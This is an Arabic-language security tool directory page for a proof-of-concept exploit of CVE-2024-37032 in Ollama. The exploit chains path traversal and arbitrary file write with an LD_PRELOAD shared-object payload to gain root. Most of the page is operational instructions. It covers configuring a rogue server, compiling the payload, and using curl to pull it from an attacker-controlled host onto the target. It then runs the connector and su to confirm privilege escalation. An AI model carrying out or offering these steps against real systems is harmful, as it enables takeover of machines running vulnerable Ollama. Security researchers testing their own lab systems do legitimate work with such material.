Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-37032-PoC — CVE-2024-37032 (Probllama) PoC لأ Ollama ≤0.1.33: اجتياز المسار وكتابة ملفات عشوائية عبر معالجة ملخص النموذج، مما يؤدي إلى تصعيد امتيازات آلي. | Kitploit
أدوات/GitHubGitHub/itzsh4dowxz/cve-2024-37032-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubitzsh4dowxz/cve-2024-37032-poc

CVE-2024-37032-PoC

CVE-2024-37032 (Probllama) PoC لأ Ollama ≤0.1.33: اجتياز المسار وكتابة ملفات عشوائية عبر معالجة ملخص النموذج، مما يؤدي إلى تصعيد امتيازات آلي.

عرض المستودع
8منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-37032 Probllama PoC — استغلال اجتياز المسار ورفع الامتيازات في Ollama

يحتوي هذا المستودع على خادم تسجيل FastAPI لإثبات المفهوم، ونص توصيل، ومكتبة تجريبية للتحميل المسبق للاختبار المختبري المصرح به.

استخدم هذا فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

الملفات

  • server.py: يبدأ خادم FastAPI لإثبات المفهوم.
  • rogue_server/config.py: الإعدادات المركزية لخادم إثبات المفهوم.
  • connector.py: يرسل طلبات السحب/الدفع إلى واجهة Ollama API المستهدفة.
  • preload_privs_demo.c: كود مصدر C لحمولة الكائن المشترك.
  • requirements.txt: تبعيات Python لخادم إثبات المفهوم.

1. تثبيت تبعيات الخادم

على جهازك المضيف، قم بتثبيت تبعيات Python:

root@kitploit:~
python -m pip install -r requirements.txt

2. تكوين المضيف والمنافذ

قم بتحرير rogue_server/config.py على جهازك المضيف:

root@kitploit:~
HOST = "<your_host_ip_or_host_ip>"

قم بتحرير connector.py:

root@kitploit:~
SERVER_HOST = "<your_host_ip_or_host_ip:8000>"
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 11434

ملاحظات:

  • يجب أن يشير SERVER_HOST إلى المضيف الذي يشغل server.py.
  • إذا كان خادم إثبات المفهوم يعمل على المنفذ 8000، أدرج المنفذ في كل من HOST و SERVER_HOST، على سبيل المثال 10.10.16.160:8000.
  • يجب أن يشير TARGET_HOST و TARGET_PORT إلى واجهة Ollama API المستهدفة. إذا كان connector.py يعمل مباشرة على الجهاز المستهدف، فإن 127.0.0.1:11434 صحيح عادةً.
  • إذا قمت بتغيير rogue_server/config.py، أعد تشغيل خادم إثبات المفهوم.

3. بناء الكائن المشترك

قم بتجميع ملف C وسمّ الناتج libpreload_privs_demo.so:

root@kitploit:~
gcc -shared -fPIC -o libpreload_privs_demo.so preload_privs_demo.c

4. نقل الملفات إلى الهدف

انسخ هذه الملفات إلى الجهاز المستهدف المصرح به:

  • libpreload_privs_demo.so
  • connector.py

طريقة بسيطة هي تقديمها من جهازك المضيف:

root@kitploit:~
python3 -m http.server 8081

ثم قم بتنزيلها من الجهاز المستهدف:

root@kitploit:~
curl -O http://<your_host_ip>:8081/libpreload_privs_demo.so
curl -O http://<your_host_ip>:8081/connector.py

بعد تنزيل الكائن المشترك، انسخ مساره المطلق على الجهاز المستهدف واضبط نفس المسار كـ exploit_path في rogue_server/config.py على الجهاز المضيف.

مثال:

root@kitploit:~
exploit_path = "/tmp/libpreload_privs_demo.so"

5. بدء خادم إثبات المفهوم

ابدأ خادم FastAPI على جهازك المضيف:

root@kitploit:~
python server.py

افتراضيًا، يبدأ هذا المشروع Uvicorn على 0.0.0.0:8000.

6. تشغيل الموصل

على الجهاز المستهدف المصرح به، قم بتشغيل:

root@kitploit:~
python3 connector.py

يرسل الموصل طلبات السحب والدفع إلى واجهة Ollama API المُعدّة.

7. التحقق من النتيجة

بعد انتهاء الموصل، قم بتشغيل:

root@kitploit:~
su

في هدف مخبري ضعيف ومُعد بشكل صحيح، يجب استخدام مسار التحميل المسبق ويمكن ملاحظة انتقال الامتياز.

استكشاف الأخطاء وإصلاحها

  • تأكد من أن جدار الحماية للمضيف يسمح بمنفذ خادم إثبات المفهوم ومنفذ خادم الملفات المؤقت.
  • تأكد من أن SERVER_HOST في connector.py يطابق HOST في rogue_server/config.py.
  • تأكد من أن exploit_path هو المسار المطلق الدقيق الذي يوجد به libpreload_privs_demo.so على الجهاز المستهدف.
  • تأكد من أن واجهة Ollama API المستهدفة قابلة للوصول على TARGET_HOST:TARGET_PORT.
  • أعد تشغيل server.py بعد تغيير rogue_server/config.py.
تنزيل الأداة